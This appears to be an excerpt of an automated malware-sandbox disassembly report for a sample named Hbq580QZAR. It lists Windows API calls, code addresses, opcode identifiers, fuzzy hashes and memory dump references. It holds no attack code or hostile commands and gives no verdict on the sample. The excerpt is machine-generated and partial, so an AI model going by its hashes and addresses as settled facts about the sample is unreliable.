                                                                                            • String ID:
                                                                                            • API String ID: 4097029671-0
                                                                                            • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                            • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                            • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                            • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentEnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2396873506-0
                                                                                            • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                            • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                            • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                            APIs
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastMove
                                                                                            • String ID:
                                                                                            • API String ID: 55378915-0
                                                                                            • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                            • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                            • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                            • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                            • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                            • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                            • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                            • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                            • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                            APIs
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                            • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeKnownPathTask
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 969438705-544719455
                                                                                            • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                            • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                            • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
Similarity
• API ID: Global$AllocLock
• String ID:
• API String ID: 15508794-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
  • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
• API String ID: 3319771486-0
APIs
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
APIs
• GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
APIs
• CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
APIs
• FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
APIs
• KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
APIs
  • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
• ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242DC
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                            • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3375834691-0
                                                                                            • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                            • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                            • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                            • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
